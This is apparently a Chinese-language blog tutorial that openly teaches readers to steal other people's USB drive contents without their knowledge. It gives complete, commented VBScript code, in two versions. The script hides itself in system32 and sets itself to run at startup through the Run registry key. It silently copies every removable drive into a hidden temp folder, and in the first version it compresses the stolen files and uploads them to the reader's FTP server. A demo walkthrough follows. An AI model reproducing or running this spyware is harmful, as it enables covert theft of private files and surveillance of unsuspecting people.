是否很多人在你電腦上插U盤，而你想偷偷竊取他U盤的數(shù)據(jù)？即使他就在你旁邊！或許你想在誰電腦中竊取它的U盤數(shù)據(jù)？這里Unis教你如何秘密地竊取別人U盤中的數(shù)據(jù)，

邪惡的U盤竊取法

。當(dāng)然如果是你自己的電腦就可以直接將對方的U盤數(shù)據(jù)，比如你想得到對方U盤中的照片、文本文檔重要信息等等啊統(tǒng)統(tǒng)的竊取到自己電腦里面的某個隱藏目錄。等對方拔出了U盤走了之后你就能完完全全看到自己電腦上已經(jīng)悄悄的把他的U盤數(shù)據(jù)偷來了！或如果是別人的電腦，你也想在他電腦中等待他插入U盤偷偷竊取U盤中的數(shù)據(jù)，然后將數(shù)據(jù)通過后臺上傳到自己的FTP空間中，自己再回家上網(wǎng)進入FTP空間下載對方U盤的數(shù)據(jù)偷偷查看。這樣都是很容易做到的，當(dāng)然后者的話就必須用到命令行中的rar.exe先將數(shù)據(jù)進行壓縮，再將數(shù)據(jù)進行FTP命令的上傳。這種偷偷竊取法相信很多人都想做到。比如，小王想得到小李對方U盤的文件，現(xiàn)只知道小李經(jīng)常會在小王電腦上插U盤查看文件，但是小李在旁邊，無法竊取對方的數(shù)據(jù)，那么小王完全可以用今天為大家講解到的U盤數(shù)據(jù)竊取方法現(xiàn)在自己的電腦中運行代碼，等待小李插入U盤的時候，后臺將悄悄地將小李U盤的數(shù)據(jù)竊取到電腦的某個隱藏角落，等待小李拔出U盤走之后，小王就可以偷偷的看小李U盤中的文件了。

    講到這里就要說到今天的代碼了，今天的主要使用的是VBS腳本，其中腳本中多以FSO文件系統(tǒng)對象這個組件進行竊取的。該代碼主要給大家分兩種，一種適合于本機，一種適合于他人的機器。其中腳本運行后將會在后臺偷偷地運行代碼，只有[color=Red]發(fā)現(xiàn)有U盤插入電腦，將會馬上將對方U盤的資料拷貝到電腦的某個隱藏目錄。等待對方拔掉U盤走人之后，你完全可以找到那個隱藏目錄偷偷查看對方U盤中的資料，適合于在自己本機的代碼主要就是將對方的U盤文件復(fù)制到自己本機隱藏目錄中，適合于他人電腦的代碼主要就是能夠先將對方U盤資料復(fù)制到他電腦的隱藏目錄中，然后將那些文件進行一個打包，上傳到FTP空間，這樣的話，雖然不能使用他電腦看竊取的資料，但是已經(jīng)在后臺將資料偷偷上傳到了自己的FTP空間中，回家自己上網(wǎng)進入FTP空間下載竊取的東西就足夠了。

    講解到這里就開始講解我們的代碼了，下面是代碼的分析，適合于在別人電腦中竊取U盤資料，需要將資料上傳到自己空間的代碼。

    （其中灰色部分是代碼解釋，紅色部分代表的是需要用戶自行修改的）

    on error resume next  //*容錯語句，即使下面有錯誤也繼續(xù)執(zhí)行

    dim fso,cmd,dir,st,drive   //*定義五個變量

    set cmd=createobject("wscript.shell")   //*cmd變量復(fù)制建立對象，調(diào)用wscript.shell組件

    set fso=createobject("scripting.filesystemobject")   //*FSO變量調(diào)用FSO文件系統(tǒng)對象

    set dir=fso.getspecialfolder(1)   //*dir變量通過FSO對象模型的getspecialfolder函數(shù)獲取系統(tǒng)目錄system32

    set st=fso.drives   //*將所有磁盤驅(qū)動信息賦值為st,此時st為數(shù)組類型

    if NOT(fso.fileexists(dir&"\rar.exe")) then

    fso.movefile "rar.exe",dir&"\rar.exe"

    end if //*以上三段判斷系統(tǒng)目錄是否存在rar.exe程序，用于命令行壓縮的工具，如果不存在則將我們帶有的rar.exe復(fù)制到dir系統(tǒng)目錄

    if not(fso.fileexists(dir&"ftp.txt")) then   //*判斷當(dāng)前system32目錄下是否有ftp.txt文本文件，該文件是執(zhí)行ftp包括的命令信息。

    set ftpfile=fso.opentextfile(dir&"\ftp.txt",2,true,0)  //*如果不存在就通過FSO的函數(shù)在系統(tǒng)目錄中創(chuàng)建ftp.txt文本。

    ftpfile.write("open IP"&vbcrlf&"username"&vbcrlf&"password"&vbcrlf&"prompt"&vbcrlf&"mput   //*通過fso的對象寫入執(zhí)行FTP命令用到的信息寫入到ftp.txtc:\windows\temp\upload\*.rar"&vbcrlf&"bye"&vbcrlf) //*并且通過ftp -s命令執(zhí)行ftp.txt中的多個文件上傳命令，上傳temp\upload中打好壓縮包的文件到空間里。

    ftpfile.close   //*結(jié)束文件上傳執(zhí)行操作

    end if

    if not(fso.fileexists(dir&"\copy.vbs")) then

    fso.getfile(wscript.scriptfullname).move(dir&"\copy.vbs")

    end if   //*將該腳本剪切到系統(tǒng)目錄中，保存為copy.vbs

    fso.createfolder("c:\windows\temp\ufile")  //*通過fso中的函數(shù)在c:\windows\temp中創(chuàng)建ufile文件，用來存放竊取的U盤文件

    fso.createfolder("c:\windows\temp\upload")  //*通過fso中的函數(shù)在c:\windows\temp中創(chuàng)建upload文件，用來存放壓縮過后即將上傳到FTP空間的文件

    cmd.regwrite "HKLM\SoftWare\Microsoft\Windows\currentversion\Run\","c:\windows\system32\copy.vbs","REG_SZ"  //*將該腳本寫入注冊表的開機啟動中，實現(xiàn)開機自動運行該腳本

    for i=1 to 2

    i=1   //*建立無限循環(huán)，保存程序一直在運行

    for each f in st

    if f.drivetype=1 then

    n=f.path   //*用for each in讀取數(shù)組st的驅(qū)動盤信息，判斷當(dāng)前移動設(shè)備是否為移動存儲設(shè)備(drivetype=0是不可識別的設(shè)，1是移動存儲設(shè)備,2是本地磁盤)并將信息賦予變量f，然后將所得到的U盤路徑信息賦予變量n

    fso.copyfile n&"\*","c:\windows\temp\ufile\"  //*通過fso函數(shù)進行復(fù)制U盤中的所有文件到C:\Windows\temp\ufile中

    fso.copyfolder n&"\*","c:\windows\temp\ufile"  //*通過fso函數(shù)進行復(fù)制U盤中的所有文件夾到C:\Windows\temp\ufile中

    cmd.run "cmd /c rar a -ag -df c:\windows\temp\upload\ c:\windows\temp\ufile",0   //*調(diào)用cmd使用rar.exe將文件打包后復(fù)制到upload目錄

    cmd.run "cmd /c ftp -s:c:\windows\system32\ftp.txt",0  [/color=SlateGray]//*調(diào)用cmd進行ftp -s 執(zhí)行ftp.txt中的上傳到空間的命令

    wscript.sleep 900000  [/color=SlateGray]//*啟動休眠，為900000毫秒，即15分鐘再執(zhí)行一次全代碼運行

    end if

    next

    next

    上面是完全適合于在別人電腦竊取，由于考慮到也到自己的電腦中竊取他人插入的U盤中的數(shù)據(jù)，就需要省去壓縮和上傳到空間中去，因為自己的電腦就不怕別人隨便亂動了，只要等對方走了就可以自己在電腦中找到隱藏目錄進行查看對方U盤數(shù)據(jù)了，

電腦資料

《邪惡的U盤竊取法》(http://m.dameics.com)。代碼簡化后主要如下：

    on error resume next

    dim fso,cmd,dir,st,drive

    set cmd=createobject("wscript.shell")

    set fso=createobject("scripting.filesystemobject")

    set dir=fso.getspecialfolder(1)

    set st=fso.drives

    if not(fso.fileexists(dir&"\copy.vbs")) then

    fso.getfile(wscript.scriptfullname).move(dir&"\copy.vbs")

    end if

    fso.createfolder("c:\windows\temp\ufile")

    cmd.regwrite "HKLM\SoftWare\Microsoft\Windows\currentversion\Run\","c:\windows\system32\copy.vbs","REG_SZ"

    for i=1 to 2

    i=1

    for each f in st

    if f.drivetype=1 then

    n=f.path

    fso.copyfile n&"\*","c:\windows\temp\ufile\"

    fso.copyfolder n&"\*","c:\windows\temp\ufile"

    wscript.sleep 500000

    end if

    next

    next

    下面我們使用第二種代碼作為一個實驗來講解，實驗主要在虛擬機中演示，首先已經(jīng)知道我的U盤有大量的數(shù)據(jù)。我們將上面的代碼全部復(fù)制到記事本中，保存后綴名為.vbs的VB腳本，保存后隨意命名，先將該腳本雙擊運行，運行之后會發(fā)現(xiàn)該腳本自動消失了，其實不然，該腳本已經(jīng)將自己剪切到了系統(tǒng)目錄中，并且寫入注冊表的啟動項，已確保每次開機都能運行該腳本進行數(shù)據(jù)的竊取。 工作原理主要是在雙擊該腳本消失后該腳本會剪切到C:\Windows\System32下，并且重新命名為copy.vbs，然后在注冊表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 鍵中的默認鍵值中加上，實現(xiàn)每次開機啟動后運行該腳本，腳本將會在后臺進行工作，一旦發(fā)現(xiàn)有移動存儲設(shè)備，例如U盤、移動硬盤就會將數(shù)據(jù)偷偷的復(fù)制到C:\Windows\temp\ufile目錄中，這個目錄可以說是很隱蔽了。但是用戶卻無法發(fā)現(xiàn)后臺有程序在拷貝自己U盤的資料，桌面完全是正常的情況，不會出現(xiàn)任何提示，哈哈！那是否等待對方走了之后就可以偷偷的在c:\windows\temp\ufile中看到竊取的U盤資料。

    現(xiàn)在的我們已經(jīng)雙擊了該腳本，腳本消失了，我們看看C:\windows\temp目錄下是暫時沒有ufile目錄的。

    后臺開始在運行腳本，此時我們打開C:\Windows\temp目錄，此時就多了一個Ufile目錄，該目錄中就存在了儲存竊取的數(shù)據(jù)

    打開我們的Ufile中，會發(fā)現(xiàn)系統(tǒng)正在慢慢地竊取U盤中的文件…….一直都在慢慢地竊取，當(dāng)然竊取等同于復(fù)制U盤中的文件，如果文件過大是需要一定時間的，也就大概幾分鐘的樣子。

    由于我的U盤中學(xué)習(xí)教程里面的資料太大，有6G多，占滿%90的U盤空間，系統(tǒng)后臺正在先復(fù)制里面的資料，復(fù)制完畢后將會偷偷復(fù)制剩下的，代碼是每隔15分鐘完全運行一次，也是為了保證某些U盤帶有數(shù)據(jù)燈，因為拷貝中速度如果過快就會狂閃。當(dāng)然如果沒有數(shù)據(jù)燈的話你完全可以設(shè)置時間為1分鐘甚至更短咯。